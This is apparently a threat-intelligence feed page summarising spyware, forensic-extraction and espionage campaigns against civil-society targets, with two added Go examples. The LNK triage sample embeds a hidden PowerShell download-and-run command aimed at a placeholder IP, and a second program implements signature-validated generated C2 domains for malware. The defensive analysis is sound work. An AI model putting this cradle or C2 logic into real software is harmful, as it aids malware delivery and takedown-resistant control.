Civic/Social Organization
Breach intelligence, attack campaigns, and threat reports targeting the Civic/Social Organization sector.
Civic/Social Organization Threat Reports
Russia's Continued Use of Cellebrite Tools Raises Concerns
In June 2021, Russian authorities utilized Cellebrite's Universal Forensic Extraction Device (UFED) to access the iPhone of detained human rights activist Andrey Pivovarov. This occurred despite Cellebrite's public announcement in March 2021 that it had ceased all sales and services to Russian government agencies. The extracted data reportedly included communications from encrypted messaging apps, which were subsequently used to surveil other dissidents. This incident underscores the challenges technology companies face in controlling the use of their tools post-sale, especially when they are employed for political repression. The case highlights the need for robust mechanisms to prevent the misuse of surveillance technologies by authoritarian regimes, even after contractual relationships have been terminated.
22 hours ago
Kill Chain
WhatsApp Thwarts NSO Group's Latest Spyware Phishing Attacks
In June 2026, WhatsApp identified and disrupted spear-phishing campaigns linked to the NSO Group, the Israeli spyware vendor behind Pegasus. The attackers relied on social engineering, luring users into clicking malicious links that redirected them to external websites set up to deploy spyware. The activity violated a 2025 U.S. court injunction barring NSO from targeting WhatsApp and its users, and Meta, WhatsApp's parent company, responded by asking the federal court to hold NSO in contempt. The incident underscores the persistent threat posed by commercial spyware vendors and the importance of pairing technical defenses with legal frameworks to protect user privacy and national security.
2 weeks ago
Kill Chain
Bitter APT's Hack-for-Hire Campaign Targets MENA Journalists
In a series of cyber espionage activities from 2023 to 2024, the Bitter APT group, suspected to have ties to the Indian government, orchestrated a hack-for-hire campaign targeting journalists, activists, and government officials across the Middle East and North Africa (MENA) region. Notably, Egyptian journalists Mostafa Al-A'sar and Ahmed Eltantawy were subjected to spear-phishing attacks aimed at compromising their Apple and Google accounts. These attacks involved deceptive emails leading to counterfeit login pages designed to harvest credentials and two-factor authentication codes. ([thehackernews.com](https://thehackernews.com/2026/04/bitter-linked-hack-for-hire-campaign.html?utm_source=openai)) This incident underscores a concerning trend of state-affiliated threat actors employing sophisticated social engineering tactics to infiltrate the accounts of individuals critical of governmental policies. The Bitter APT group's activities highlight the persistent and evolving nature of cyber threats targeting civil society in the MENA region. ([accessnow.org](https://www.accessnow.org/press-release/hack-for-hire-new-report-egyptian-journalists/?utm_source=openai))
2 months ago
Kill Chain
Unveiling the 2023-2024 Hack-for-Hire Campaign Targeting Journalists in MENA
Between 2023 and 2024, a sophisticated hack-for-hire campaign targeted journalists and activists in the Middle East and North Africa, notably in Egypt and Lebanon. The attackers employed spear-phishing techniques, sending messages that appeared to be from legitimate sources to deceive victims into revealing personal data, including credentials and financial information. This campaign has been linked to the Bitter APT group, known for targeting government and critical infrastructure sectors across South Asia. The operation underscores the persistent threat posed by state-sponsored cyber espionage groups utilizing advanced social engineering tactics to infiltrate and compromise sensitive information. ([accessnow.org](https://www.accessnow.org/press-release/hack-for-hire-new-report-egyptian-journalists/?utm_source=openai))
2 months ago
Kill Chain
CRESCENTHARVEST Malware Campaign Exploits Iran Protests to Target Supporters
In early January 2026, a cyberespionage campaign named CRESCENTHARVEST emerged, targeting individuals supporting Iran's anti-government protests. Attackers distributed malicious archive files containing authentic protest media and Farsi-language reports, alongside disguised Windows shortcut (.LNK) files. When executed, these shortcuts deployed a remote access trojan (RAT) capable of executing commands, logging keystrokes, and exfiltrating sensitive data. The campaign's sophistication suggests alignment with Iranian state interests, aiming for long-term surveillance and information theft. This incident underscores the increasing use of geopolitical events as lures in cyberattacks, highlighting the need for heightened vigilance among activists, journalists, and dissidents. The campaign's reliance on social engineering and legitimate-looking media emphasizes the importance of verifying the authenticity of received files, especially those related to sensitive political contexts.
4 months ago
Kill Chain
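The lure shape described above, a Windows shortcut named like a document and packed beside genuine media, is cheap to triage mechanically. The following Go program is an added example (not code from the original page or from any CRESCENTHARVEST reporting): it parses the MS-SHLLINK format far enough to recover the target and command line, then lists why a given shortcut deserves attention. The sample shortcut, its PowerShell download cradle and the address 203.0.113.10 are constructed for this example; nothing here reproduces the real campaign's artifacts.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Shortcut holds the StringData fields that reveal what a .LNK launches.
type Shortcut struct{ Name, RelativePath, WorkingDir, Arguments, IconLocation string }

// ParseLNK reads a Windows shell link (MS-SHLLINK): header check, skip of the optional
// LinkTargetIDList and LinkInfo blocks, then StringData. LinkFlags bits: 0 HasLinkTargetIDList,
// 1 HasLinkInfo, 2-6 the five StringData fields present in that order, 7 IsUnicode (UTF-16LE).
func ParseLNK(b []byte) (s Shortcut, err error) {
	defer func() { // an out-of-range read on a truncated or malformed file becomes an error
		if r := recover(); r != nil {
			err = fmt.Errorf("malformed shell link: %v", r)
		}
	}()
	if binary.LittleEndian.Uint32(b) != 0x4C {
		return s, fmt.Errorf("not a shell link: HeaderSize %#x", binary.LittleEndian.Uint32(b))
	}
	flags, off := binary.LittleEndian.Uint32(b[20:]), 76
	if flags&1 != 0 {
		off += 2 + int(binary.LittleEndian.Uint16(b[off:]))
	}
	if flags&2 != 0 {
		off += int(binary.LittleEndian.Uint32(b[off:])) // LinkInfoSize counts itself
	}
	width := 1 + int(flags>>7&1) // bytes per character: 2 when IsUnicode (bit 7) is set
	for i, dst := range [5]*string{&s.Name, &s.RelativePath, &s.WorkingDir, &s.Arguments, &s.IconLocation} {
		if flags&(1<<uint(i+2)) == 0 {
			continue
		}
		n := int(binary.LittleEndian.Uint16(b[off:])) * width
		raw := b[off+2 : off+2+n]
		off += 2 + n
		*dst = string(raw) // ANSI string data
		if width == 2 {
			u := make([]uint16, n/2)
			for j := range u {
				u[j] = binary.LittleEndian.Uint16(raw[2*j:])
			}
			*dst = string(utf16.Decode(u))
		}
	}
	return s, nil
}

var scriptHosts = map[string]bool{"powershell.exe": true, "cmd.exe": true, "mshta.exe": true, "wscript.exe": true, "cscript.exe": true, "rundll32.exe": true, "regsvr32.exe": true}

// Triage lists why a shortcut found beside lure media deserves attention: a
// document-like double extension, a script-host target, download or hidden-window arguments.
func Triage(fileName string, data []byte) []string {
	var reasons []string
	if stem := strings.TrimSuffix(strings.ToLower(fileName), ".lnk"); strings.Contains(stem, ".") {
		reasons = append(reasons, "double extension mimics "+stem[strings.LastIndex(stem, "."):])
	}
	sc, err := ParseLNK(data)
	if err != nil {
		return append(reasons, "unparseable LNK: "+err.Error())
	}
	target := strings.ToLower(sc.RelativePath[strings.LastIndexAny(sc.RelativePath, `\/`)+1:]) // basename
	if scriptHosts[target] {
		reasons = append(reasons, "target is script host "+target)
	}
	for _, ind := range []string{"hidden", "-enc", "iex", "downloadstring", "http"} {
		if strings.Contains(strings.ToLower(sc.Arguments), ind) {
			reasons = append(reasons, "argument indicator "+ind)
		}
	}
	return reasons
}

// SampleLNK builds the kind of shortcut shipped beside genuine protest media
// (constructed for this example, not a real CRESCENTHARVEST file).
func SampleLNK() []byte {
	hdr := make([]byte, 76)
	binary.LittleEndian.PutUint32(hdr, 0x4C)
	copy(hdr[4:], "\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") // LinkCLSID
	binary.LittleEndian.PutUint32(hdr[20:], 0x80|1<<3|1<<4|1<<5)                    // IsUnicode, RelativePath, WorkingDir, Arguments
	buf := bytes.NewBuffer(hdr)
	for _, str := range []string{`..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, `.`,
		`-w hidden -nop -c "iex (New-Object Net.WebClient).DownloadString('http://203.0.113.10/rat.ps1')"`} {
		u := utf16.Encode([]rune(str))
		binary.Write(buf, binary.LittleEndian, uint16(len(u)))
		binary.Write(buf, binary.LittleEndian, u)
	}
	return buf.Bytes()
}

func main() {
	fmt.Println(strings.Join(Triage("casualties.pdf.lnk", SampleLNK()), "; "))
}
```

Running it prints the six reasons for the sample: the `.pdf.lnk` double extension, a script-host target and the hidden-window, `iex`, `DownloadString` and `http` argument markers. The parser deliberately stops at StringData; the ExtraData blocks that follow (tracker, environment and property-store blocks) carry the machine ID and original path and are worth a second pass in a full investigation, but the target and arguments alone are enough to decide whether an archive entry is media or a dropper.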
Kenyan Activist's Phone Compromised by Cellebrite Extraction
In July 2025, Kenyan pro-democracy activist Boniface Mwangi was arrested, and his personal devices were confiscated by authorities. Upon their return in September 2025, Mwangi discovered that his Samsung phone's password protection had been removed. Forensic analysis by Citizen Lab revealed with high confidence that Kenyan authorities utilized Cellebrite's forensic extraction tools on his device during its custody, enabling full access to sensitive information including messages, personal files, financial data, and passwords. This incident underscores the potential misuse of advanced surveillance technologies by government entities to target civil society members. The case highlights the growing concerns over digital privacy and the ethical implications of deploying such tools without proper oversight, emphasizing the need for stringent regulations to prevent abuse and protect individual rights.
4 months ago
Kill Chain
RedKitten 2026: Iranian State-Sponsored Malware Targets Human Rights NGOs
In January 2026, a cyber espionage campaign named RedKitten targeted non-governmental organizations and individuals documenting human rights abuses in Iran. The attackers employed AI-generated malware, delivered through malicious Excel files disguised as casualty records from recent protests. Once a victim enabled macros, the malware, dubbed SloppyMIO, was deployed; it fetched its configuration from GitHub and Google Drive and used Telegram for command-and-control. The operation is attributed to Iranian state-sponsored actors aiming to infiltrate and disrupt human rights documentation efforts. ([harfanglab.io](https://harfanglab.io/insidethelab/redkitten-ai-accelerated-campaign-targeting-iranian-protests/?utm_source=openai)) The incident underscores the escalating use of artificial intelligence in cyber attacks, which shortens the time needed to develop and deploy new malware. The targeting of human rights organizations highlights the growing risks faced by civil society groups and the need for stronger defenses against state-sponsored threats.
4 months ago
Kill Chain
WhatsApp Unveils "Strict Account Settings" to Combat Spyware in 2024
In June 2024, WhatsApp introduced a lockdown-style "Strict Account Settings" feature to counter the growing threat of spyware targeting its user base—including journalists, activists, and public figures. This proactive measure allows users to limit messaging and attachment options from unknown contacts, mitigating risks of exploitation similar to past incidents like the Pegasus spyware attacks. The rollout follows WhatsApp’s ongoing legal battles with threat actors and reflects the platform’s drive to strengthen user privacy and security in the wake of sophisticated surveillance malware campaigns. This development highlights an industry-wide shift towards advanced, user-accessible security controls as spyware campaigns become more adept at circumventing traditional defenses. Organizations and high-risk users face mounting pressure from both regulatory frameworks and adversary innovation, compelling tech platforms to continually adapt and raise the bar for account protection and threat mitigation.
4 months ago
Kill Chain
Jordan Government’s Use of Cellebrite Forensics Tools Targets Activists in 2024
Between late 2023 and mid-2024, Jordanian authorities used Cellebrite’s digital forensic technology to access and extract data from the mobile phones of local activists and human rights defenders. According to an investigation by Citizen Lab and OCCRP, authorities seized activists’ devices—three iPhones and one Android—and subjected them to Cellebrite’s phone-cracking tools, often in connection with political protests. Court records and forensic analysis confirmed the use of Cellebrite products to nonconsensually access information, shaking victims’ trust and prompting self-censorship. This incident underscores the growing risks of commercial digital forensics tools being repurposed for surveillance beyond criminal cases. Amnesty International and other watchdogs report a broader trend of such technologies being leveraged against civil society, signaling a need for stronger governance, vendor accountability, and compliance oversight globally.
5 months ago
Kill Chain
Dormant No More: Prince of Persia APT's Sophisticated Espionage Tactics Unveiled in 2025
In December 2025, security researchers reported that the Iranian advanced persistent threat (APT) group "Prince of Persia" (also known as "Infy"), long assumed dormant, had in fact remained operational for years. Using upgraded versions of its Foudre and Tonnerre malware families, the group conducted persistent cyber espionage against Iranian dissidents as well as individuals in Iraq, Turkey, India, Europe, and Canada. Its command-and-control (C2) design is the notable part: dynamically generated C2 domains are accepted by the malware only after an RSA signature over them verifies against a key embedded in the implant, and Telegram-based channels provide an additional path. This makes the infrastructure resilient to takedown and hard to sinkhole, since a defender who predicts and registers a candidate domain cannot produce a valid signature for it. Combined with disciplined operational security and state backing, this sets the group apart from typical regional APTs. The case shows how state-backed actors adopt cryptography and messaging platforms to protect their infrastructure, and is a prompt for organizations to review their readiness against stealthy, long-running campaigns that evade known countermeasures.
5 months ago
Kill Chain
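The domain-validation mechanism the report describes, modelled as an added example in Go (not Infy's code and not taken from the researchers' write-up): the implant carries only the operator's public key, generates candidate domains, and talks to the first one whose published signature verifies. The candidate derivation, the seed `example-seed`, the `.example` TLD and the in-memory "published signatures" map are constructed stand-ins for the real DGA and for whatever channel (DNS record, hosted file, Telegram post) actually carries the proof.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// Candidates derives the day's candidate domains from a seed baked into the
// implant and the date. The derivation is a constructed stand-in; the real
// Foudre/Tonnerre algorithm is not reproduced here.
func Candidates(seed, date string, n int, tld string) []string {
	out := make([]string, 0, n)
	for i := 0; i < n; i++ {
		h := sha256.Sum256([]byte(fmt.Sprintf("%s|%s|%d", seed, date, i)))
		out = append(out, hex.EncodeToString(h[:6])+tld)
	}
	return out
}

// SignDomain is the operator-side step: only the private-key holder can
// produce the proof that a candidate domain is really theirs.
func SignDomain(priv *rsa.PrivateKey, domain string) ([]byte, error) {
	d := sha256.Sum256([]byte(domain))
	return rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, d[:])
}

// VerifyDomain is the implant-side check against the embedded public key.
func VerifyDomain(pub *rsa.PublicKey, domain string, sig []byte) bool {
	d := sha256.Sum256([]byte(domain))
	return rsa.VerifyPKCS1v15(pub, crypto.SHA256, d[:], sig) == nil
}

// Published stands in for whatever channel carries the proof (a DNS TXT
// record, a file served from the domain, a Telegram post): domain -> signature.
type Published map[string][]byte

// SelectC2 walks the candidates in order and returns the first whose published
// signature verifies; registered-but-unsigned and mis-signed domains are skipped.
func SelectC2(pub *rsa.PublicKey, candidates []string, reg Published) (string, bool) {
	for _, d := range candidates {
		if sig, ok := reg[d]; ok && VerifyDomain(pub, d, sig) {
			return d, true
		}
	}
	return "", false
}

// Scenario plays out a takeover attempt: a defender pre-registers candidate 0
// as a sinkhole (no signature), a third party signs candidate 1 with a key of
// their own, and the operator signs candidate 2. It returns the domain the
// implant picks and the one the operator intended.
func Scenario() (chosen, intended string, err error) {
	operator, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return "", "", err
	}
	impostor, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return "", "", err
	}
	cands := Candidates("example-seed", "2025-12-01", 5, ".example") // seed and TLD are constructed
	reg := Published{cands[0]: nil}
	if reg[cands[1]], err = SignDomain(impostor, cands[1]); err != nil {
		return "", "", err
	}
	if reg[cands[2]], err = SignDomain(operator, cands[2]); err != nil {
		return "", "", err
	}
	chosen, ok := SelectC2(&operator.PublicKey, cands, reg)
	if !ok {
		return "", cands[2], fmt.Errorf("no candidate verified")
	}
	return chosen, cands[2], nil
}

func main() {
	chosen, intended, err := Scenario()
	if err != nil {
		panic(err)
	}
	fmt.Printf("implant selected %s; operator signed %s\n", chosen, intended)
}
```

The implant skips the sinkholed domain and the impostor's domain and lands on the operator's, which is the whole point of the design: predicting the DGA is not enough, because registering a domain does not let you sign for it. For defenders the consequence is that takeover-style countermeasures fail against this family, and detection has to come from the behaviour around the check instead, such as a host walking a list of algorithmically shaped names and fetching a short record from each, or a process reaching Telegram's API that has no business doing so.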
Intellexa Predator Spyware Strikes Pakistani Civil Society via WhatsApp (2025)
In June 2025, a human rights lawyer based in Balochistan, Pakistan, was targeted by Intellexa's highly advanced Predator spyware via a malicious WhatsApp link, according to Amnesty International. This marks the first documented case of a civil society member in Pakistan being targeted by this tool. The attacker, likely operating with government-grade resources, used zero-day exploits and an advertising-based infection vector to bypass conventional defenses, aiming to infiltrate the lawyer's mobile device and access sensitive communications. This incident underscores the growing sophistication of spyware campaigns and the expansion of mercenary surveillance tools targeting individuals beyond political figures or journalists. It highlights the urgent need for robust communication security and regulatory scrutiny of commercial spyware vendors.
5 months ago
Kill Chain
CISA Warns: Surge in Spyware Targeting Messaging Apps (2024)
In June 2024, the Cybersecurity and Infrastructure Security Agency (CISA) issued a critical alert about threat actors leveraging commercial spyware to infiltrate messaging applications. Attackers have used sophisticated social engineering and mimicry of trusted messaging apps to deploy Android spyware, sometimes via malicious image files shared through platforms like WhatsApp, or by exploiting vulnerabilities in applications such as Signal, especially on Samsung devices. The primary victims are high-value individuals, including government, military, and political officials, as well as civil society members, with attacks observed across the United States, the Middle East, and Europe. A successful compromise gives the attacker device access and a foothold for further payloads, putting personal and organizational data at risk. CISA's alert underscores a sharp escalation in spyware attacks and the arrival of new delivery vectors such as malicious QR codes and zero-click exploits. The advisory highlights the urgent need for preventative security hygiene, particularly as attackers increasingly aim at the mobile messaging platforms used by sensitive sectors.
5 months ago
Kill Chain